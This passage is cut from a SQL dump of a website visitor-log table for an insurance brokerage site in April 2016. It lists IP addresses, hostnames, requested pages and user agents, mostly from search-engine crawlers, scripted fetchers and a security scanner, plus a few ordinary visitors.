Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20964,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578949','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/?page_id=169','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20966,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578951','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20969,'0b_4d997329472f15695d632b25dbcdbb11','1461578952','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/?page_id=169','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','169',0),(20970,'0b_4d997329472f15695d632b25dbcdbb11','1461578953','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20973,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578954','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/?page_id=171?a=pwdreset','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20976,'0b_4d997329472f15695d632b25dbcdbb11','1461578955','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20979,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578956','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20982,'0b_4d997329472f15695d632b25dbcdbb11','1461578957','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20985,'0b_4d997329472f15695d632b25dbcdbb11','1461578958','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','http://www.empireins.com/','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20988,'0b_4d997329472f15695d632b25dbcdbb11','1461578961','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20991,'0b_4d997329472f15695d632b25dbcdbb11','1461578963','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','http://www.empireins.com/','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20993,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578964','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20994,'0b_4d997329472f15695d632b25dbcdbb11','1461578966','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20996,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578968','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20999,'0b_4d997329472f15695d632b25dbcdbb11','1461578969','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21002,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578971','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21003,'0b_4d997329472f15695d632b25dbcdbb11','1461578973','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21006,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578975','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21008,'0b_4d997329472f15695d632b25dbcdbb11','1461578976','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21011,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578978','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/licensing-contracting/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21014,'0b_4d997329472f15695d632b25dbcdbb11','1461578979','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21015,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578981','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21017,'0b_4d997329472f15695d632b25dbcdbb11','1461578982','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21020,'0b_4d997329472f15695d632b25dbcdbb11','1461578983','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','http://www.empireins.com/','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21023,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578985','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/carriers/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21024,'0b_4d997329472f15695d632b25dbcdbb11','1461578986','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/carriers/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21027,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578988','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21030,'0b_4d997329472f15695d632b25dbcdbb11','1461578990','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21032,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578996','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21033,'0b_4d997329472f15695d632b25dbcdbb11','1461578997','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21035,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578999','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21036,'0b_4d997329472f15695d632b25dbcdbb11','1461579000','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21039,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579002','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21041,'0b_4d997329472f15695d632b25dbcdbb11','1461579003','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21042,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579006','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21044,'0b_4d997329472f15695d632b25dbcdbb11','1461579007','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21047,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579009','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21050,'0b_4d997329472f15695d632b25dbcdbb11','1461579010','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21053,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579012','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21054,'0b_4d997329472f15695d632b25dbcdbb11','1461579013','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21057,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579015','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/contact/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21059,'0b_4d997329472f15695d632b25dbcdbb11','1461579017','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21060,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579020','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21063,'0b_4d997329472f15695d632b25dbcdbb11','1461579021','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(21065,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461579027','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(21066,'0b_4d997329472f15695d632b25dbcdbb11','1461579028','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(21068,'0b_0ba1bac6b1b6d33f26e1d78c884b5e77','1461580715','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21069,'0b_0ba1bac6b1b6d33f26e1d78c884b5e77','1461580717','68.180.230.123','b115363.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21072,'0b_6b62a111b34eed5c84a358f3867252fd','1461581601','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21075,'0b_6b62a111b34eed5c84a358f3867252fd','1461581602','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21077,'0b_6b62a111b34eed5c84a358f3867252fd','1461581606','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21078,'0b_6b62a111b34eed5c84a358f3867252fd','1461581607','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21080,'0b_6b62a111b34eed5c84a358f3867252fd','1461581610','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21081,'0b_6b62a111b34eed5c84a358f3867252fd','1461581610','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21083,'0b_6b62a111b34eed5c84a358f3867252fd','1461581617','157.55.39.245','msnbot-157-55-39-245.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21086,'0b_1ceee12ff1cf9885a9a9a8d5d9f343df','1461581640','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21089,'0b_1ceee12ff1cf9885a9a9a8d5d9f343df','1461581641','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21090,'0b_1ceee12ff1cf9885a9a9a8d5d9f343df','1461581642','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21092,'0b_0d8f4da7fc276f551bd3b0d73f0aa27f','1461582164','207.46.13.186','msnbot-207-46-13-186.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21093,'0b_0d8f4da7fc276f551bd3b0d73f0aa27f','1461582838','207.46.13.186','msnbot-207-46-13-186.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21096,'0b_0d8f4da7fc276f551bd3b0d73f0aa27f','1461582839','207.46.13.186','msnbot-207-46-13-186.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21099,'0b_0d8f4da7fc276f551bd3b0d73f0aa27f','1461582840','207.46.13.186','msnbot-207-46-13-186.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21101,'0b_2907abde90f7fe230d6ddbefc69719e8','1461583486','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21104,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584458','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21105,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584460','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21107,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584462','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21108,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584463','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21110,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584463','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21113,'0b_5f6d882830b74c39c5c836caea1f12bc','1461584465','157.55.39.156','msnbot-157-55-39-156.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21114,'0b_8bf7cb6464b3294b7d1b72054ecf5dda','1461585145','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21116,'0b_8bf7cb6464b3294b7d1b72054ecf5dda','1461585164','66.249.66.21','crawl-66-249-66-21.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21117,'0b_f5ec282750599acbf8f7e0e144ea8e43','1461587459','195.154.56.126','195-154-56-126.rev.poneytelecom.eu','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(21120,'0b_edc4786a56f7e93f73a1bfa65547ae91','1461590274','188.166.48.88','188.166.48.88','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(21122,'0b_edc4786a56f7e93f73a1bfa65547ae91','1461590278','188.166.48.88','188.166.48.88','/carriers/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(21125,'0b_4b82ad8638567d86239efe58f93e392d','1461594209','157.55.39.57','msnbot-157-55-39-57.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21128,'0b_01551079e85e4b286d9a893cb13cb329','1461594333','172.58.105.77','172.58.105.77','/','Mozilla/5.0 (Linux; Android 5.1; HTC Desire 626s Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36','','',0,'Android 5','Chrome 47 Mobile','us','360 x 640','','','','','','0','0',0),(21129,'0b_01551079e85e4b286d9a893cb13cb329','1461594344','172.58.105.77','172.58.105.77','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1; HTC Desire 626s Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 47 Mobile','us','360 x 640','','','','','','0','0',0),(21131,'0b_01551079e85e4b286d9a893cb13cb329','1461594474','172.58.105.77','172.58.105.77','/case-status/','Mozilla/5.0 (Linux; Android 5.1; HTC Desire 626s Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 47 Mobile','us','360 x 640','','','','','','0','0',0),(21132,'0b_296041216bc4096533aa0fbe6aff8dc4','1461596655','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21134,'0b_296041216bc4096533aa0fbe6aff8dc4','1461596658','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21137,'0b_296041216bc4096533aa0fbe6aff8dc4','1461596661','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21138,'0b_296041216bc4096533aa0fbe6aff8dc4','1461596663','184.154.36.163','scan21.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21141,'0b_296041216bc4096533aa0fbe6aff8dc4','1461596668','184.154.36.163','scan21.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21143,'0b_67e27322d09a832d0fe9f6f9732966f8','1461597337','83.217.27.128','vadimkuzmich.example.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1715.52 Safari/537.36','','',0,'Linux','Chrome 32','us','','','','','','','0','0',0),(21144,'0b_ced380ac841cea24753ba79c65769387','1461597486','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21146,'0b_5ab1257f49f2183f8a9adf1439cc5d8b','1461598853','108.182.17.6','cpe-108-182-17-6.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','','Google','','','','','0','0',0),(21147,'0b_5ab1257f49f2183f8a9adf1439cc5d8b','1461598855','108.182.17.6','cpe-108-182-17-6.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(21149,'0b_f9d29a3123b7897c2a464f0f70dc2fdb','1461599730','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(21152,'0b_6b6ae37fa5a80493f1f124fbe5647383','1461600734','216.17.99.183','server1.peach-hosting.com','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0','','',0,'Win8 x64','Firefox 44','','','','','','','','0','0',0),(21153,'0b_27dbf11f55ac1bd143c769257075c4f2','1461600740','94.242.222.23','ip-static-94-242-222-23.server.lu','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0','','',0,'Win8 x64','Firefox 44','lu','','','','','','','0','0',0),(21156,'0b_6efa7f4b5633035986c80eae064d8890','1461601666','207.46.13.46','msnbot-207-46-13-46.search.msn.com','[404] /documents/JHFewerMedicalExamFlyer.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21158,'0b_b75ce873ab3921e3b32312cd4f2c520c','1461601746','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; 